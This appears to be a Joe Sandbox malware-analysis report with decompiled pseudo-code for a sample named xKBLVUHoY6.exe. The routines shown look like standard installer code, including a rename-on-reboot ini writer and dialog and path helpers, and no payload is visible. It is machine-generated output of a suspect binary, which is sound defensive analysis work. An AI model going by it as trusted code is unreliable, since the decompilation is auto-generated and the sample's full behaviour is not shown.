                                                C-Code - Quality: 100%
                                                			E0040614D(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t12;
                                                				long _t24;
                                                				char* _t31;
                                                				int _t37;
                                                				void* _t38;
                                                				intOrPtr* _t39;
                                                				long _t42;
                                                				WCHAR* _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t52;
                                                				void* _t53;
                                                
                                                				_t38 = __ecx;
                                                				_t44 =  *(_t52 + 0x14);
                                                				 *0x426da8 = 0x55004e;
                                                				 *0x426dac = 0x4c;
                                                				if(_t44 == 0) {
                                                					L3:
                                                					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4275a8, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						_t37 = wsprintfA(0x4269a8, "%ls=%ls\r\n", 0x426da8, 0x4275a8);
                                                						_t53 = _t52 + 0x10;
                                                						E00406544(_t37, 0x400, 0x4275a8, 0x4275a8,  *((intOrPtr*)( *0x42a230 + 0x128)));
                                                						_t12 = E00405FF7(0x4275a8, 0xc0000000, 4);
                                                						_t48 = _t12;
                                                						 *(_t53 + 0x18) = _t48;
                                                						if(_t48 != 0xffffffff) {
                                                							_t42 = GetFileSize(_t48, 0);
                                                							_t6 = _t37 + 0xa; // 0xa
                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                							if(_t46 == 0 || E0040607A(_t48, _t46, _t42) == 0) {
                                                								L18:
                                                								return CloseHandle(_t48);
                                                							} else {
                                                								if(E00405F5C(_t38, _t46, "[Rename]\r\n") != 0) {
                                                									_t49 = E00405F5C(_t38, _t21 + 0xa, "\n[");
                                                									if(_t49 == 0) {
                                                										_t48 =  *(_t53 + 0x18);
                                                										L16:
                                                										_t24 = _t42;
                                                										L17:
                                                										E00405FB2(_t24 + _t46, 0x4269a8, _t37);
                                                										SetFilePointer(_t48, 0, 0, 0);
                                                										E004060A9(_t48, _t46, _t42 + _t37);
                                                										GlobalFree(_t46);
                                                										goto L18;
                                                									}
                                                									_t39 = _t46 + _t42;
                                                									_t31 = _t39 + _t37;
                                                									while(_t39 > _t49) {
                                                										 *_t31 =  *_t39;
                                                										_t31 = _t31 - 1;
                                                										_t39 = _t39 - 1;
                                                									}
                                                									_t24 = _t49 - _t46 + 1;
                                                									_t48 =  *(_t53 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                								_t42 = _t42 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E00405FF7(_t44, 0, 1));
                                                					_t12 = GetShortPathNameW(_t44, 0x426da8, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t12;
                                                			}



















                                                0x0040614d
                                                0x00406156
                                                0x0040615d
                                                0x00406167
                                                0x0040617b
                                                0x004061a3
                                                0x004061ae
                                                0x004061b2
                                                0x004061d2
                                                0x004061d9
                                                0x004061e3
                                                0x004061f0
                                                0x004061f5
                                                0x004061fa
                                                0x004061fe
                                                0x0040620d
                                                0x0040620f
                                                0x0040621c
                                                0x00406220
                                                0x004062bb
                                                0x00000000
                                                0x00406236
                                                0x00406243
                                                0x00406267
                                                0x0040626b
                                                0x0040628a
                                                0x0040628e
                                                0x0040628e
                                                0x00406290
                                                0x00406299
                                                0x004062a4
                                                0x004062af
                                                0x004062b5
                                                0x00000000
                                                0x004062b5
                                                0x0040626d
                                                0x00406270
                                                0x0040627b
                                                0x00406277
                                                0x00406279
                                                0x0040627a
                                                0x0040627a
                                                0x00406282
                                                0x00406284
                                                0x00000000
                                                0x00406284
                                                0x0040624e
                                                0x00406254
                                                0x00000000
                                                0x00406254
                                                0x00406220
                                                0x004061fe
                                                0x0040617d
                                                0x00406188
                                                0x00406191
                                                0x00406195
                                                0x00000000
                                                0x00000000
                                                0x00406195
                                                0x004062c6

                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
                                                • GetShortPathNameW.KERNEL32 ref: 00406191
                                                  • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                                  • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                                • GetShortPathNameW.KERNEL32 ref: 004061AE
                                                • wsprintfA.USER32 ref: 004061CC
                                                • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
                                                • GlobalFree.KERNEL32 ref: 004062B5
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
                                                  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                                  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]
                                                • API String ID: 2171350718-461813615
                                                • Opcode ID: 48f58ee6c1568dd199c04865158994eb8a9ff379ffc5c95430a82ce8fda2b485
                                                • Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
                                                • Opcode Fuzzy Hash: 48f58ee6c1568dd199c04865158994eb8a9ff379ffc5c95430a82ce8fda2b485
                                                • Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004044CA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                				struct tagLOGBRUSH _v16;
                                                				long _t39;
                                                				long _t41;
                                                				void* _t44;
                                                				signed char _t50;
                                                				long* _t54;
                                                
                                                				if(_a4 + 0xfffffecd > 5) {
                                                					L18:
                                                					return 0;
                                                				}
                                                				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                					goto L18;
                                                				} else {
                                                					_t50 = _t54[5];
                                                					if((_t50 & 0xffffffe0) != 0) {
                                                						goto L18;
                                                					}
                                                					_t39 =  *_t54;
                                                					if((_t50 & 0x00000002) != 0) {
                                                						_t39 = GetSysColor(_t39);
                                                					}
                                                					if((_t54[5] & 0x00000001) != 0) {
                                                						SetTextColor(_a8, _t39);
                                                					}
                                                					SetBkMode(_a8, _t54[4]);
                                                					_t41 = _t54[1];
                                                					_v16.lbColor = _t41;
                                                					if((_t54[5] & 0x00000008) != 0) {
                                                						_t41 = GetSysColor(_t41);
                                                						_v16.lbColor = _t41;
                                                					}
                                                					if((_t54[5] & 0x00000004) != 0) {
                                                						SetBkColor(_a8, _t41);
                                                					}
                                                					if((_t54[5] & 0x00000010) != 0) {
                                                						_v16.lbStyle = _t54[2];
                                                						_t44 = _t54[3];
                                                						if(_t44 != 0) {
                                                							DeleteObject(_t44);
                                                						}
                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                					}
                                                					return _t54[3];
                                                				}
                                                			}









                                                0x004044dc
                                                0x00404592
                                                0x00000000
                                                0x00404592
                                                0x004044ed
                                                0x004044f1
                                                0x00000000
                                                0x0040450b
                                                0x0040450b
                                                0x00404514
                                                0x00000000
                                                0x00000000
                                                0x00404516
                                                0x00404522
                                                0x00404525
                                                0x00404525
                                                0x0040452b
                                                0x00404531
                                                0x00404531
                                                0x0040453d
                                                0x00404543
                                                0x0040454a
                                                0x0040454d
                                                0x00404550
                                                0x00404552
                                                0x00404552
                                                0x0040455a
                                                0x00404560
                                                0x00404560
                                                0x0040456a
                                                0x0040456f
                                                0x00404572
                                                0x00404577
                                                0x0040457a
                                                0x0040457a
                                                0x0040458a
                                                0x0040458a
                                                0x00000000
                                                0x0040458d

                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 004044E7
                                                • GetSysColor.USER32(00000000), ref: 00404525
                                                • SetTextColor.GDI32(?,00000000), ref: 00404531
                                                • SetBkMode.GDI32(?,?), ref: 0040453D
                                                • GetSysColor.USER32(?), ref: 00404550
                                                • SetBkColor.GDI32(?,?), ref: 00404560
                                                • DeleteObject.GDI32(?), ref: 0040457A
                                                • CreateBrushIndirect.GDI32(?), ref: 00404584
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t72;
                                                				void* _t76;
                                                				void* _t79;
                                                
                                                				_t72 = __edx;
                                                				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                				_t65 = 2;
                                                				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                				_t66 = E00402D84(_t65);
                                                				_t79 = _t66 - 1;
                                                				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                				if(_t79 < 0) {
                                                					L36:
                                                					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
                                                				} else {
                                                					__ecx = 0x3ff;
                                                					if(__eax > 0x3ff) {
                                                						 *(__ebp - 0x44) = 0x3ff;
                                                					}
                                                					if( *__edi == __bx) {
                                                						L34:
                                                						__ecx =  *(__ebp - 0xc);
                                                						__eax =  *(__ebp - 8);
                                                						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                						if(_t79 == 0) {
                                                							 *(_t76 - 4) = 1;
                                                						}
                                                						goto L36;
                                                					} else {
                                                						 *(__ebp - 0x38) = __ebx;
                                                						 *(__ebp - 0x18) = E00406467(__ecx, __edi);
                                                						if( *(__ebp - 0x44) > __ebx) {
                                                							do {
                                                								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E004060D8( *(__ebp - 0x18), __ebx) >= 0) {
                                                										__eax = __ebp - 0x50;
                                                										if(E0040607A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                											goto L34;
                                                										} else {
                                                											goto L21;
                                                										}
                                                									} else {
                                                										goto L34;
                                                									}
                                                								} else {
                                                									__eax = __ebp - 0x40;
                                                									_push(__ebx);
                                                									_push(__ebp - 0x40);
                                                									__eax = 2;
                                                									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                									if(__eax == 0) {
                                                										goto L34;
                                                									} else {
                                                										__ecx =  *(__ebp - 0x40);
                                                										if(__ecx == __ebx) {
                                                											goto L34;
                                                										} else {
                                                											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                											 *(__ebp - 0x4c) = __ecx;
                                                											 *(__ebp - 0x50) = __eax;
                                                											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                												L28:
                                                												__ax & 0x0000ffff = E0040644E( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                											} else {
                                                												__ebp - 0x50 = __ebp + 0xa;
                                                												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                													L21:
                                                													__eax =  *(__ebp - 0x50);
                                                												} else {
                                                													__edi =  *(__ebp - 0x4c);
                                                													__edi =  ~( *(__ebp - 0x4c));
                                                													while(1) {
                                                														_t22 = __ebp - 0x40;
                                                														 *_t22 =  *(__ebp - 0x40) - 1;
                                                														__eax = 0xfffd;
                                                														 *(__ebp - 0x50) = 0xfffd;
                                                														if( *_t22 == 0) {
                                                															goto L22;
                                                														}
                                                														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                														__edi = __edi + 1;
                                                														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                														__eax = __ebp + 0xa;
                                                														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                															continue;
                                                														} else {
                                                															goto L21;
                                                														}
                                                														goto L22;
                                                													}
                                                												}
                                                												L22:
                                                												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                													goto L28;
                                                												} else {
                                                													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                														} else {
                                                															__ecx =  *(__ebp - 0xc);
                                                															__edx =  *(__ebp - 8);
                                                															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														}
                                                														goto L34;
                                                													} else {
                                                														__ecx =  *(__ebp - 0xc);
                                                														__edx =  *(__ebp - 8);
                                                														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                														 *(__ebp - 0x38) = __eax;
                                                														if(__ax == __bx) {
                                                															goto L34;
                                                														} else {
                                                															goto L26;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L37;
                                                								L26:
                                                								__eax =  *(__ebp - 8);
                                                							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                						}
                                                						goto L34;
                                                					}
                                                				}
                                                				L37:
                                                				return 0;
                                                			}








                                                0x004026ec
                                                0x004026ee
                                                0x004026f1
                                                0x004026f3
                                                0x004026f6
                                                0x004026fb
                                                0x004026ff
                                                0x00402702
                                                0x00402705
                                                0x00402c2a
                                                0x00402c2d
                                                0x0040270b
                                                0x0040270b
                                                0x00402712
                                                0x00402714
                                                0x00402714
                                                0x0040271a
                                                0x0040287e
                                                0x0040287e
                                                0x00402881
                                                0x00402886
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00000000
                                                0x00402720
                                                0x00402721
                                                0x0040272c
                                                0x0040272f
                                                0x0040273b
                                                0x0040273f
                                                0x004027d7
                                                0x004027ef
                                                0x004027ff
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402745
                                                0x00402745
                                                0x00402748
                                                0x00402749
                                                0x0040274c
                                                0x00402751
                                                0x00402758
                                                0x00402760
                                                0x00000000
                                                0x00402766
                                                0x00402766
                                                0x0040276b
                                                0x00000000
                                                0x00402771
                                                0x00402771
                                                0x00402779
                                                0x0040277c
                                                0x0040277f
                                                0x0040283a
                                                0x00402841
                                                0x00402785
                                                0x0040278b
                                                0x00402797
                                                0x00402801
                                                0x00402801
                                                0x00402799
                                                0x00402799
                                                0x0040279c
                                                0x0040279e
                                                0x0040279e
                                                0x0040279e
                                                0x004027a1
                                                0x004027a6
                                                0x004027a9
                                                0x00000000
                                                0x00000000
                                                0x004027ab
                                                0x004027ae
                                                0x004027bc
                                                0x004027c2
                                                0x004027d0
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d2
                                                0x00000000
                                                0x004027d0
                                                0x0040279e
                                                0x00402804
                                                0x00402807
                                                0x00000000
                                                0x00402809
                                                0x0040280e
                                                0x0040284f
                                                0x00402871
                                                0x00402878
                                                0x0040285d
                                                0x0040285d
                                                0x00402860
                                                0x00402863
                                                0x00402866
                                                0x00402866
                                                0x00000000
                                                0x00402817
                                                0x00402817
                                                0x0040281a
                                                0x0040281d
                                                0x00402823
                                                0x00402827
                                                0x0040282a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040282a
                                                0x0040280e
                                                0x00402807
                                                0x0040277f
                                                0x0040276b
                                                0x00402760
                                                0x00000000
                                                0x0040282c
                                                0x0040282c
                                                0x0040282f
                                                0x00402838
                                                0x00000000
                                                0x0040272f
                                                0x0040271a
                                                0x00402c33
                                                0x00402c39

                                                APIs
                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                  • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                • Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
                                                • Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
                                                • Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0040678E(WCHAR* _a4) {
                                                				short _t5;
                                                				short _t7;
                                                				WCHAR* _t19;
                                                				WCHAR* _t20;
                                                				WCHAR* _t21;
                                                
                                                				_t20 = _a4;
                                                				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                					_t20 =  &(_t20[4]);
                                                				}
                                                				if( *_t20 != 0 && E00405E4D(_t20) != 0) {
                                                					_t20 =  &(_t20[2]);
                                                				}
                                                				_t5 =  *_t20;
                                                				_t21 = _t20;
                                                				_t19 = _t20;
                                                				if(_t5 != 0) {
                                                					do {
                                                						if(_t5 > 0x1f &&  *((short*)(E00405E03(L"*?|<>/\":", _t5))) == 0) {
                                                							E00405FB2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                							_t19 = CharNextW(_t19);
                                                						}
                                                						_t20 = CharNextW(_t20);
                                                						_t5 =  *_t20;
                                                					} while (_t5 != 0);
                                                				}
                                                				 *_t19 =  *_t19 & 0x00000000;
                                                				while(1) {
                                                					_push(_t19);
                                                					_push(_t21);
                                                					_t19 = CharPrevW();
                                                					_t7 =  *_t19;
                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                						break;
                                                					}
                                                					 *_t19 =  *_t19 & 0x00000000;
                                                					if(_t21 < _t19) {
                                                						continue;
                                                					}
                                                					break;
                                                				}
                                                				return _t7;
                                                			}








                                                0x00406790
                                                0x00406799
                                                0x004067b0
                                                0x004067b0
                                                0x004067b7
                                                0x004067c3
                                                0x004067c3
                                                0x004067c6
                                                0x004067c9
                                                0x004067ce
                                                0x004067d0
                                                0x004067d9
                                                0x004067dd
                                                0x004067fa
                                                0x00406802
                                                0x00406802
                                                0x00406807
                                                0x00406809
                                                0x0040680c
                                                0x00406811
                                                0x00406812
                                                0x00406816
                                                0x00406816
                                                0x00406817
                                                0x0040681e
                                                0x00406820
                                                0x00406827
                                                0x00000000
                                                0x00000000
                                                0x0040682f
                                                0x00406835
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406835
                                                0x0040683a

                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                • CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-4010320282
                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                • Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00404E1E(struct HWND__* _a4, intOrPtr _a8) {
                                                				long _v8;
                                                				signed char _v12;
                                                				unsigned int _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				long _v56;
                                                				void* _v60;
                                                				long _t15;
                                                				unsigned int _t19;
                                                				signed int _t25;
                                                				struct HWND__* _t28;
                                                
                                                				_t28 = _a4;
                                                				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                				if(_a8 == 0) {
                                                					L4:
                                                					_v56 = _t15;
                                                					_v60 = 4;
                                                					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                					return _v24;
                                                				}
                                                				_t19 = GetMessagePos();
                                                				_v16 = _t19 >> 0x10;
                                                				_v20 = _t19;
                                                				ScreenToClient(_t28,  &_v20);
                                                				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                				if((_v12 & 0x00000066) != 0) {
                                                					_t15 = _v8;
                                                					goto L4;
                                                				}
                                                				return _t25 | 0xffffffff;
                                                			}














                                                0x00404e2c
                                                0x00404e39
                                                0x00404e3f
                                                0x00404e7d
                                                0x00404e7d
                                                0x00404e8c
                                                0x00404e93
                                                0x00000000
                                                0x00404e95
                                                0x00404e41
                                                0x00404e50
                                                0x00404e58
                                                0x00404e5b
                                                0x00404e6d
                                                0x00404e73
                                                0x00404e7a
                                                0x00000000
                                                0x00404e7a
                                                0x00000000

                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
                                                • GetMessagePos.USER32 ref: 00404E41
                                                • ScreenToClient.USER32 ref: 00404E5B
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
